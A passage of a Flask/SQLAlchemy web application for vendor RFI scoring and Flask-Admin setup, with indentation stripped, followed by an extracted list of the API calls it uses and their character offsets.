#print('yqr_headers3', yqr_headers3)
print('yqr_headers_columns', yqr_headers_columns)
print('yqr_headers', yqr_headers)
#for item1 in ids_list:
#for item2 in item1[1]:
#print('smceid', item2[0], 'variantid', item2[2] ,elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.example_scoring).first()[1])
width = 3 + len(yqr_headers)
info = [] #[category,[element_name, spec, example scoring, ss_q1y1, sd_q1y1, at_q1y1, sm_q1y1, an_q1y1, ss_q2y1, sd_q2y1, at_q2y1, sm_q2y1, an_q2y1...], smceid, [ss_current_round_1] ]
for item1 in ids_list:
cat_name_id = suitemodcat.query.filter_by(suitemodcatid = item1[0]).add_columns(suitemodcat.category_name_id).first()[1]
cat_name = category_names.query.filter_by(category_nameid = cat_name_id).add_columns(category_names.category_name).first()[1]
info.append([cat_name, item1[0]])
for item2 in item1[1]:
row = []
elem_name = element_names.query.filter_by(element_nameid = item2[1]).add_columns(element_names.elementname).first()[1]
row.append([elem_name])
spec = elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.specification).first()[1]
row[0].append(spec)
es = elementvariants.query.filter_by(variantid = item2[2]).add_columns(elementvariants.example_scoring).first()[1]
row[0].append(es)
data = None
'''for item3 in yqr_headers:
col = None
if item3[1] == 5: col = 'self_score'
elif item3[1] == 6: col = 'self_description'
elif item3[1] == 7: col = 'attachment_id'
elif item3[1] == 8: col = 'sm_score'
elif item3[1] == 9: col = 'analyst_notes'
try:
data = df.loc[(df['smce_id'] == item2[0]) & (df['year'] == item3[0][0]) & (df['quarter'] == item3[0][1]) & (df['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)'''
for item3 in yqr_headers:
col = None
if item3[1] == 5 or item3[1] == 6 or item3[1] == 7:
if item3[1] == 5: col = 'self_score'
elif item3[1] == 6: col = 'self_description'
elif item3[1] == 7: col = 'attachment_id'
try:
      if item3[1] == 5: #self_score is stored as an integer, but pandas converts it to float; int() strips the trailing .0. If it was NULL, the lookup raises and the except below yields None
data = int(df_providers.loc[(df_providers['smce_id'] == item2[0]) & (df_providers['year'] == item3[0][0]) & (df_providers['quarter'] == item3[0][1]) & (df_providers['round'] == item3[0][2]), col].tolist()[0])
else:
data = df_providers.loc[(df_providers['smce_id'] == item2[0]) & (df_providers['year'] == item3[0][0]) & (df_providers['quarter'] == item3[0][1]) & (df_providers['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)
elif item3[1] == 8 or item3[1] == 9:
if item3[1] == 8: col = 'sm_score'
elif item3[1] == 9: col = 'analyst_notes'
try:
if item3[1] == 8 and int(df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]) == df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]: #same as with self_score
data = int(df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0])
else:
data = df_analysts.loc[(df_analysts['smce_id'] == item2[0]) & (df_analysts['year'] == item3[0][0]) & (df_analysts['quarter'] == item3[0][1]) & (df_analysts['round'] == item3[0][2]), col].tolist()[0]
except:
data = None
row[0].append(data)
row.append(item2[0]) #appending smceid
#append current_rounds or [None, None...]
'''try:
current_round_1 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_1 = [None, None, None, None, None]
row.append(current_round_1)
try:
current_round_2 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_2 = [None, None, None, None, None]
row.append(current_round_2)'''
#append current_rounds or [None, None...]
try: current_round_1_providers = rfielements_providers.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).first()[1:4]
except: current_round_1_providers = [None, None, None]
try: current_round_1_analysts = rfielements_analysts.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 1).order_by(desc(rfielements_analysts.update_date)).add_columns(rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).first()[1:3]
except: current_round_1_analysts = [None, None]
current_round_1 = []
for item in current_round_1_providers: current_round_1.append(item)
for item in current_round_1_analysts: current_round_1.append(item)
row.append(current_round_1)
'''try:
current_round_2 = rfielements.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements.update_date)).add_columns(rfielements.self_score, rfielements.self_description, rfielements.attachment_id, rfielements.sm_score, rfielements.analyst_notes).first()[1:6]
except:
current_round_2 = [None, None, None, None, None]
row.append(current_round_2)'''
try: current_round_2_providers = rfielements_providers.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements_providers.update_date)).add_columns(rfielements_providers.self_score, rfielements_providers.self_description, rfielements_providers.attachment_id).first()[1:4]
except: current_round_2_providers = [None, None, None]
try: current_round_2_analysts = rfielements_analysts.query.filter_by(vendor_id = vendorid, smce_id = item2[0], quarter = current_quarter, year = current_year, round = 2).order_by(desc(rfielements_analysts.update_date)).add_columns(rfielements_analysts.sm_score, rfielements_analysts.analyst_notes).first()[1:3]
except: current_round_2_analysts = [None, None]
current_round_2 = []
for item in current_round_2_providers: current_round_2.append(item)
for item in current_round_2_analysts: current_round_2.append(item)
row.append(current_round_2)
#append [Current SS, Current SM]
try:
'''row_number_column = func.row_number().over(partition_by=(rfielements_providers.vendor_id, rfielements_providers.smce_id), order_by=(desc(rfielements_providers.year), desc(rfielements_providers.quarter), desc(rfielements_providers.round), desc(rfielements_providers.update_date))).label('row_order')
current_ss = rfielements_providers.query.with_entities(rfielements_providers.self_score, row_number_column).filter_by(vendor_id = vendorid, smce_id = item2[0]).filter(or_(rfielements_providers.year < current_year, and_(rfielements_providers.year == current_year, rfielements_providers.quarter <= current_quarter))).from_self().filter(row_number_column == 1).first()[0]'''
current_ss = last_self_score(vendorid, item2[0], current_quarter, current_year)
except TypeError: current_ss = None
try: current_sm_score = last_sm_score(vendorid, item2[0], current_quarter, current_year)
   except TypeError: current_sm_score = None
row.append([current_ss, current_sm_score])
row.append(item1[0]) #suitemodcatid, will be row[5] in order to make jinja2 & jquery work.
info.append(row)
#print('info\n', info)
modified_smceids = []
if request.method == 'POST' and "submit_button" in request.form: #When the button 'Submit updates' is pressed
for item1 in info:
  if len(item1) != 2: #when it is a category row, len of the list will be 2: [category_name, suitemodcatid]
change = 0 #flag to update current element
#Check if there is a change in SS
if request.form['ss-' + str(current_round) + '-' + str(item1[1])] == "" and item1[1+current_round][0] != None: #if there was a SS but now it's NULL
new_ss = None
change = 1
elif request.form['ss-' + str(current_round) + '-' + str(item1[1])] != "" and item1[1+current_round][0] != int(request.form['ss-' + str(current_round) + '-' + str(item1[1])]): #if the SS has changed from one number to another
new_ss = int(request.form['ss-' + str(current_round) + '-' + str(item1[1])])
change = 1
else: new_ss = item1[1+current_round][0] #just in case there is a change in SD, it's not really a new SS
#Check if there is a change in SD
if request.form['sd-' + str(current_round) + '-' + str(item1[1])] == "" and item1[1+current_round][1] != None: #if there was a SD but now it's NULL
new_sd = None
change = 1
elif request.form['sd-' + str(current_round) + '-' + str(item1[1])] != "" and item1[1+current_round][1] != request.form['sd-' + str(current_round) + '-' + str(item1[1])]: #if the SD has changed
new_sd = request.form['sd-' + str(current_round) + '-' + str(item1[1])]
change = 1
   else: new_sd = item1[1+current_round][1] #just in case there is a change in SS, it's not really a new SD
if change == 1:
element_row = rfielements_providers(vendor_id = vendorid, smce_id = item1[1], quarter = current_quarter, year = current_year, round = current_round, self_score = new_ss, self_description = new_sd, attachment_id = None, user_id = 1)
db.session.add(element_row)
modified_smceids.append(item1[1])
if len(modified_smceids) > 0:
db.session.commit()
print('commit done')
if len(modified_smceids) == 0:
  flash('No updates were received')
elif len(modified_smceids) == 1:
flash('Updates saved for ' + str(len(modified_smceids)) + ' element')
elif len(modified_smceids) > 1:
flash('Updates saved for ' + str(len(modified_smceids)) + ' elements')
return redirect(urllib.parse.quote( url_for(request.endpoint) + vendor_name))
#testing helper
print("current_quarter_year", current_quarter, current_year)
print("previous_quarter_year", previous_quarter_year(current_quarter, current_year))
print("next_quarter_year", next_quarter_year(current_quarter, current_year))
'''
rfielements_info=[]
quarters_header = set()
for item in rfielements_info_raw:
rfielements_info.append([item[1], item[2], item[3], item[4], item[5], item[6], item[7], item[8], item[9], item[10]])
for item in rfielements_info:
quarters_header.add((item[3], item[2], item[4]))
quarters_header = sorted(quarters_header) #now it is a list, not a set anymore.
columns_perquarter = [ [] for _ in range(len(quarters_header))] #creating a list of dimension = number of quarters
columns_header = set()
for row in rfielements_info:
aux_tuple = (row[3], row[2], row[4])
if aux_tuple not in quarters_header:
sys.exit("Element's (year, quarter, round) is not in quarters_header")
else:
index = quarters_header.index(aux_tuple)
for i in range(5,10):
if row[i] is not None and i not in columns_perquarter[index]:
columns_perquarter[index].append(i)
columns_header.add((aux_tuple,i))
for i in range(len(quarters_header)):
quarters_header[i] = [quarters_header[i], None]
for quarter in columns_perquarter:
quarter = sorted(quarter)
for item1, item2 in zip(quarters_header, columns_perquarter):
item1[1] = item2
columns_header = sorted(columns_header)
#check everything is alright
if(sum(len(x) for x in columns_perquarter) != len(columns_header)):
  sys.exit('columns_perquarter length != columns_header length')
del columns_perquarter #we moved it to quarters_header, we don't need it anymore.
rfielements_info_show = [ [None for _ in range(len(columns_header))] for _ in range(len(smce_ids_list)) ]
#print('rfielements_info', rfielements_info )
for row in rfielements_info:
index1 = smce_ids_list.index(row[1])
for j in range(5,10):
if row[j] is not None:
index2 = columns_header.index(((row[3], row[2], row[4]),j))
rfielements_info_show[index1][index2] = row[j]
print('quarters_header', quarters_header)
print('columns_header', columns_header)
'''
return render_template('rfi:vendor:module.html', title = title, vendor_name = vendor_name, module_name = module_name, urllib_parse_quote = urllib.parse.quote,
info = info, yq_headers = yq_headers, yqr_headers = yqr_headers, width = width, current_quarter = current_quarter, current_year = current_year,
status = status, current_round = current_round, form = form, modified_smceids = modified_smceids,
summary_table = summary_table)
db.init_app(app) #this was supposed to be inside if __name__ but it didn't work: https://stackoverflow.com/questions/30764073/sqlalchemy-extension-isnt-registered-when-running-app-with-gunicorn
mail.init_app(app) #same as db.init_app
admin = Admin(app, name='SolutionMap Admin', template_mode='bootstrap3')
class users_view(ModelView):
can_delete = False
page_size = 50
column_list = ['userid', 'email', 'user_type','assigned_vendor_id', 'password', 'update_date', 'active', 'registration_date', 'anonymized', 'private']
column_sortable_list = ['userid', 'email', 'user_type','assigned_vendor_id', 'password', 'update_date', 'active', 'registration_date', 'anonymized', 'private']
column_exclude_list = ['password' ]
class vendors_view(ModelView):
column_list = ['vendorid', 'vendor_name', 'quarter', 'year', 'update_date', 'active', 'parent_vendorid', 'vendor_weight']
page_size = 50
column_searchable_list = ['vendor_name']
column_filters = ['vendor_name', 'quarter', 'year']
can_view_details = True
column_editable_list = ['vendor_name', 'quarter', 'year'] #inline editing
create_modal = True
edit_modal = True
form_choices = {
'quarter': [
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4')
],
'year': [
(2017, '2017'), (2018, '2018'), (2019, '2019')
]
}
can_export = True
class vendors_rfi_view(ModelView):
column_list = ['vendor_id', 'suitemod_id', 'quarter', 'year', 'status', 'current_round']
'''form_ajax_refs = {
'suitemod_id': {
'fields': ['suitemod_name'],
'page_size': 10
}
}'''
class rfielements_providers_view(ModelView):
column_list = ['vendor_id', 'smce_id', 'quarter', 'year', 'round', 'update_date', 'self_score', 'self_description', 'attachment_id', 'user_id']
page_size = 100
class current_quarteryear_view(ModelView):
column_list = ['quarter', 'year']
can_delete = False
can_create = False
edit_modal = True
column_editable_list = ['quarter', 'year']
form_choices = {
'quarter': [
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4')
],
'year': [
(2017, '2017'), (2018, '2018'), (2019, '2019')
]
}
#admin.add_view(ModelView(users, db.session, name='Users'))
#admin.add_view(ModelView(vendors, db.session))
#admin.add_view(ModelView(vendors_rfi, db.session))
#admin.add_view(ModelView(rfielements_providers, db.session))
#admin.add_view(ModelView(rfielements_analysts, db.session))
admin.add_view(users_view(users, db.session, name = 'Users'))
admin.add_view(vendors_view(vendors, db.session, name = 'Vendors'))
admin.add_view(vendors_rfi_view(vendors_rfi, db.session, name = 'Vendors - RFI'))
admin.add_view(rfielements_providers_view(rfielements_providers, db.session, name = 'RFIelements - Providers'))
admin.add_view(current_quarteryear_view(current_quarteryear, db.session, name = 'Current QY'))
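#the admin views registered above are served at Flask-Admin's default /admin
#endpoint; each ModelView subclass above customizes the listing columns,
#inline editing and form choices for its table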
if __name__ == '__main__':
#before config:
#app.run(debug=True)
csrf.init_app(app) #this one after config
#db.init_app(app)
#mail.init_app(app)
with app.app_context():
db.create_all() #this will create every table that IS NOT created already
app.run()
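#deployment note (illustrative): because db.init_app and mail.init_app run at
#import time (see the comment above db.init_app), the app can also be served by
#a WSGI server without executing this __main__ block, e.g. with
#`gunicorn -w 4 'app:app'`; the module name 'app' is an assumption here,
#substitute the actual filename.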
|
[
"models.db.session.commit",
"flask.flash",
"models.db.init_app",
"models.db.session.add",
"flask_mail.Mail",
"forms.ElementForm",
"models.userstest.query.filter_by",
"models.category_names.query.filter_by",
"flask.url_for",
"helper.previous_quarter_year",
"pandas.set_option",
"models.suitemodcat.query.filter_by",
"pandas.DataFrame",
"helper.last_self_score",
"flask_admin.Admin",
"models.rfielements_providers",
"models.rfielements_analysts.query.filter_by",
"helper.next_quarter_year",
"models.suitemodcatelem.query.filter_by",
"models.db.create_all",
"flask.render_template",
"models.rfielements_providers.smce_id.in_",
"models.rfielements_analysts.smce_id.in_",
"threading.Thread",
"flask_mail.Message",
"models.current_quarteryear.query.add_columns",
"models.vendors_rfi.query.filter_by",
"models.elementvariants.query.filter_by",
"models.userstest",
"flask_wtf.CSRFProtect",
"helper.last_sm_score",
"models.vendors.query.filter_by",
"models.comments",
"models.suitemodules.query.filter_by",
"forms.LoginForm",
"sys.exit",
"forms.CommentForm",
"models.rfielements_providers.query.filter_by",
"forms.CreateForm",
"flask.session.pop",
"flask.Flask",
"models.comments.query.join",
"sqlalchemy.desc",
"sqlalchemy.create_engine",
"models.element_names.query.filter_by"
] |
[((1348, 1404), 'sqlalchemy.create_engine', 'create_engine', (['DevelopmentConfig.SQLALCHEMY_DATABASE_URI'], {}), '(DevelopmentConfig.SQLALCHEMY_DATABASE_URI)\n', (1361, 1404), False, 'from sqlalchemy import create_engine\n'), ((1522, 1571), 'pandas.set_option', 'pd.set_option', (['"""display.expand_frame_repr"""', '(False)'], {}), "('display.expand_frame_repr', False)\n", (1535, 1571), True, 'import pandas as pd\n'), ((1909, 1924), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (1914, 1924), False, 'from flask import Flask\n'), ((2457, 2473), 'flask_wtf.CSRFProtect', 'CSRFProtect', (['app'], {}), '(app)\n', (2468, 2473), False, 'from flask_wtf import CSRFProtect\n'), ((2540, 2546), 'flask_mail.Mail', 'Mail', ([], {}), '()\n', (2544, 2546), False, 'from flask_mail import Mail\n'), ((35823, 35839), 'models.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (35834, 35839), False, 'from models import db\n'), ((36066, 36130), 'flask_admin.Admin', 'Admin', (['app'], {'name': '"""SolutionMap Admin"""', 'template_mode': '"""bootstrap3"""'}), "(app, name='SolutionMap Admin', template_mode='bootstrap3')\n", (36071, 36130), False, 'from flask_admin import Admin\n'), ((2655, 2756), 'flask_mail.Message', 'Message', (['"""Thank you for signing up!"""'], {'sender': "app.config['MAIL_USERNAME']", 'recipients': '[user_email]'}), "('Thank you for signing up!', sender=app.config['MAIL_USERNAME'],\n recipients=[user_email])\n", (2662, 2756), False, 'from flask_mail import Message\n'), ((2799, 2847), 'flask.render_template', 'render_template', (['"""email.html"""'], {'username': 'username'}), "('email.html', username=username)\n", (2814, 2847), False, 'from flask import render_template\n'), ((4471, 4513), 'flask.render_template', 'render_template', (['"""index.html"""'], {'title': 'title'}), "('index.html', title=title)\n", (4486, 4513), False, 'from flask import render_template\n'), ((4873, 4902), 'forms.LoginForm', 'forms.LoginForm', (['request.form'], {}), '(request.form)\n', (4888, 4902), False, 'import forms\n'), ((5815, 5861), 'flask.render_template', 'render_template', (['"""login.html"""'], {'form': 'login_form'}), "('login.html', form=login_form)\n", (5830, 5861), False, 'from flask import render_template\n'), ((6203, 6234), 'forms.CommentForm', 'forms.CommentForm', (['request.form'], {}), '(request.form)\n', (6220, 6234), False, 'import forms\n'), ((6884, 6955), 'flask.render_template', 'render_template', (['"""comment.html"""'], {'title': 'title', 'comment_form': 'comment_form'}), "('comment.html', title=title, comment_form=comment_form)\n", (6899, 6955), False, 'from flask import render_template\n'), ((7039, 7069), 'forms.CreateForm', 'forms.CreateForm', (['request.form'], {}), '(request.form)\n', (7055, 7069), False, 'import forms\n'), ((7963, 8011), 'flask.render_template', 'render_template', (['"""create.html"""'], {'form': 'create_form'}), "('create.html', form=create_form)\n", (7978, 8011), False, 'from flask import render_template\n'), ((8512, 8591), 'flask.render_template', 'render_template', (['"""reviews.html"""'], {'comments': 'comment_list', 'date_format': 'date_format'}), "('reviews.html', comments=comment_list, date_format=date_format)\n", (8527, 8591), False, 'from flask import render_template\n'), ((2989, 3016), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (3004, 3016), False, 'from flask import render_template\n'), ((4613, 4636), 'flask.session.pop', 'session.pop', (['"""username"""'], {}), "('username')\n", (4624, 4636), 
False, 'from flask import session\n'), ((4670, 4686), 'flask.url_for', 'url_for', (['"""login"""'], {}), "('login')\n", (4677, 4686), False, 'from flask import url_for\n'), ((5959, 5989), 'flask.render_template', 'render_template', (['"""cookie.html"""'], {}), "('cookie.html')\n", (5974, 5989), False, 'from flask import render_template\n'), ((6647, 6704), 'models.comments', 'comments', ([], {'user_id': 'user_id', 'text': 'comment_form.comment.data'}), '(user_id=user_id, text=comment_form.comment.data)\n', (6655, 6704), False, 'from models import comments\n'), ((6738, 6761), 'models.db.session.add', 'db.session.add', (['comment'], {}), '(comment)\n', (6752, 6761), False, 'from models import db\n'), ((6764, 6783), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6781, 6783), False, 'from models import db\n'), ((6828, 6850), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (6833, 6850), False, 'from flask import flash\n'), ((7137, 7229), 'models.userstest', 'userstest', (['create_form.username.data', 'create_form.password.data', 'create_form.email.data'], {}), '(create_form.username.data, create_form.password.data, create_form\n .email.data)\n', (7146, 7229), False, 'from models import userstest\n'), ((7242, 7262), 'models.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (7256, 7262), False, 'from models import db\n'), ((7320, 7339), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (7337, 7339), False, 'from models import db\n'), ((7690, 7785), 'threading.Thread', 'threading.Thread', ([], {'name': '"""mail_sender"""', 'target': 'send_message', 'args': '(user.email, user.username)'}), "(name='mail_sender', target=send_message, args=(user.email,\n user.username))\n", (7706, 7785), False, 'import threading\n'), ((7931, 7953), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (7936, 7953), False, 'from flask import flash\n'), ((11160, 11321), 'flask.render_template', 'render_template', (['"""rfi:vendor.html"""'], {'title': 'title', 'vendor_name': 'vendor_name', 'module_status_round': 'module_status_round', 'urllib_parse_quote': 'urllib.parse.quote'}), "('rfi:vendor.html', title=title, vendor_name=vendor_name,\n module_status_round=module_status_round, urllib_parse_quote=urllib.\n parse.quote)\n", (11175, 11321), False, 'from flask import render_template\n'), ((11934, 11965), 'forms.ElementForm', 'forms.ElementForm', (['request.form'], {}), '(request.form)\n', (11951, 11965), False, 'import forms\n'), ((16918, 16962), 'pandas.DataFrame', 'pd.DataFrame', (['rfielements_providers_info_raw'], {}), '(rfielements_providers_info_raw)\n', (16930, 16962), True, 'import pandas as pd\n'), ((17168, 17211), 'pandas.DataFrame', 'pd.DataFrame', (['rfielements_analysts_info_raw'], {}), '(rfielements_analysts_info_raw)\n', (17180, 17211), True, 'import pandas as pd\n'), ((35387, 35805), 'flask.render_template', 'render_template', (['"""rfi:vendor:module.html"""'], {'title': 'title', 'vendor_name': 'vendor_name', 'module_name': 'module_name', 'urllib_parse_quote': 'urllib.parse.quote', 'info': 'info', 'yq_headers': 'yq_headers', 'yqr_headers': 'yqr_headers', 'width': 'width', 'current_quarter': 'current_quarter', 'current_year': 'current_year', 'status': 'status', 'current_round': 'current_round', 'form': 'form', 'modified_smceids': 'modified_smceids', 'summary_table': 'summary_table'}), "('rfi:vendor:module.html', title=title, vendor_name=\n vendor_name, module_name=module_name, urllib_parse_quote=urllib.parse.\n 
quote, info=info, yq_headers=yq_headers, yqr_headers=yqr_headers, width\n =width, current_quarter=current_quarter, current_year=current_year,\n status=status, current_round=current_round, form=form, modified_smceids\n =modified_smceids, summary_table=summary_table)\n", (35402, 35805), False, 'from flask import render_template\n'), ((38886, 38901), 'models.db.create_all', 'db.create_all', ([], {}), '()\n', (38899, 38901), False, 'from models import db\n'), ((3608, 3624), 'flask.url_for', 'url_for', (['"""login"""'], {}), "('login')\n", (3615, 3624), False, 'from flask import url_for\n'), ((5359, 5381), 'flask.flash', 'flash', (['success_message'], {}), '(success_message)\n', (5364, 5381), False, 'from flask import flash\n'), ((5548, 5568), 'flask.flash', 'flash', (['error_message'], {}), '(error_message)\n', (5553, 5568), False, 'from flask import flash\n'), ((33270, 33322), 'helper.previous_quarter_year', 'previous_quarter_year', (['current_quarter', 'current_year'], {}), '(current_quarter, current_year)\n', (33291, 33322), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((33353, 33401), 'helper.next_quarter_year', 'next_quarter_year', (['current_quarter', 'current_year'], {}), '(current_quarter, current_year)\n', (33370, 33401), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((3801, 3817), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (3808, 3817), False, 'from flask import url_for\n'), ((5045, 5089), 'models.userstest.query.filter_by', 'userstest.query.filter_by', ([], {'username': 'username'}), '(username=username)\n', (5070, 5089), False, 'from models import userstest\n'), ((5468, 5484), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (5475, 5484), False, 'from flask import url_for\n'), ((9080, 9146), 'models.current_quarteryear.query.add_columns', 'current_quarteryear.query.add_columns', (['current_quarteryear.quarter'], {}), '(current_quarteryear.quarter)\n', (9117, 9146), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((9174, 9237), 'models.current_quarteryear.query.add_columns', 'current_quarteryear.query.add_columns', (['current_quarteryear.year'], {}), '(current_quarteryear.year)\n', (9211, 9237), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32734, 32753), 'models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (32751, 32753), False, 'from models import db\n'), ((32818, 32852), 'flask.flash', 'flash', (['"""No updates where received"""'], {}), "('No updates where received')\n", (32823, 32852), False, 'from flask import flash\n'), ((8278, 8308), 'models.comments.query.join', 'comments.query.join', (['userstest'], {}), '(userstest)\n', (8297, 8308), False, 'from models import comments\n'), ((14244, 14310), 'helper.last_self_score', 'last_self_score', (['vendorid', 'item2[0]', 'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (14259, 14310), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((30310, 30376), 'helper.last_self_score', 'last_self_score', (['vendorid', 'item2[0]', 
'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (30325, 30376), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((30445, 30509), 'helper.last_sm_score', 'last_sm_score', (['vendorid', 'item2[0]', 'current_quarter', 'current_year'], {}), '(vendorid, item2[0], current_quarter, current_year)\n', (30458, 30509), False, 'from helper import previous_quarter_year, next_quarter_year, last_self_score, last_sm_score\n'), ((8969, 9017), 'models.vendors.query.filter_by', 'vendors.query.filter_by', ([], {'vendor_name': 'vendor_name'}), '(vendor_name=vendor_name)\n', (8992, 9017), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((12348, 12399), 'models.suitemodcat.query.filter_by', 'suitemodcat.query.filter_by', ([], {'suitemod_id': 'suitemodid'}), '(suitemod_id=suitemodid)\n', (12375, 12399), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32404, 32613), 'models.rfielements_providers', 'rfielements_providers', ([], {'vendor_id': 'vendorid', 'smce_id': 'item1[1]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': 'current_round', 'self_score': 'new_ss', 'self_description': 'new_sd', 'attachment_id': 'None', 'user_id': '(1)'}), '(vendor_id=vendorid, smce_id=item1[1], quarter=\n current_quarter, year=current_year, round=current_round, self_score=\n new_ss, self_description=new_sd, attachment_id=None, user_id=1)\n', (32425, 32613), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((32629, 32656), 'models.db.session.add', 'db.session.add', (['element_row'], {}), '(element_row)\n', (32643, 32656), False, 'from models import db\n'), ((33113, 33138), 'flask.url_for', 'url_for', (['request.endpoint'], {}), '(request.endpoint)\n', (33120, 33138), False, 'from flask import url_for\n'), ((10959, 11001), 'sys.exit', 'sys.exit', (['"""Status is neither N, R, E or Z"""'], {}), "('Status is neither N, R, E or Z')\n", (10967, 11001), False, 'import sys\n'), ((11389, 11444), 'models.suitemodules.query.filter_by', 'suitemodules.query.filter_by', ([], {'suitemod_name': 'module_name'}), '(suitemod_name=module_name)\n', (11417, 11444), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16145, 16193), 'models.rfielements_providers.smce_id.in_', 'rfielements_providers.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (16178, 16193), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16576, 16623), 'models.rfielements_analysts.smce_id.in_', 'rfielements_analysts.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (16608, 16623), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, 
suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((12799, 12851), 'models.suitemodcatelem.query.filter_by', 'suitemodcatelem.query.filter_by', ([], {'suitemodcat_id': 'item'}), '(suitemodcat_id=item)\n', (12830, 12851), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13530, 13569), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (13534, 13569), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((16078, 16135), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (16115, 16135), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((16510, 16566), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (16546, 16566), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((22735, 22786), 'models.suitemodcat.query.filter_by', 'suitemodcat.query.filter_by', ([], {'suitemodcatid': 'item1[0]'}), '(suitemodcatid=item1[0])\n', (22762, 22786), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((22856, 22915), 'models.category_names.query.filter_by', 'category_names.query.filter_by', ([], {'category_nameid': 'cat_name_id'}), '(category_nameid=cat_name_id)\n', (22886, 22915), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, 